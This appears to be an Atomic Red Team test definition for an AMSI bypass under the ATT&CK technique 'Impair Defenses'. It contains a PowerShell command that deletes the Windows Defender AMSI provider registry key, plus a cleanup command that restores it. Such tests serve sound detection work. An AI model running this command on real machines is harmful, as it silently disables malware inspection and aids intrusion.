#TechniqueName: Impair Defenses: Disable or Modify Tools
#AtomicTestName: AMSI Bypass - Remove AMSI Provider Reg Key
#Description: With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.&This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.&Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.&
#Language: ps1

#commands
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse


#cleanup_commands
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null

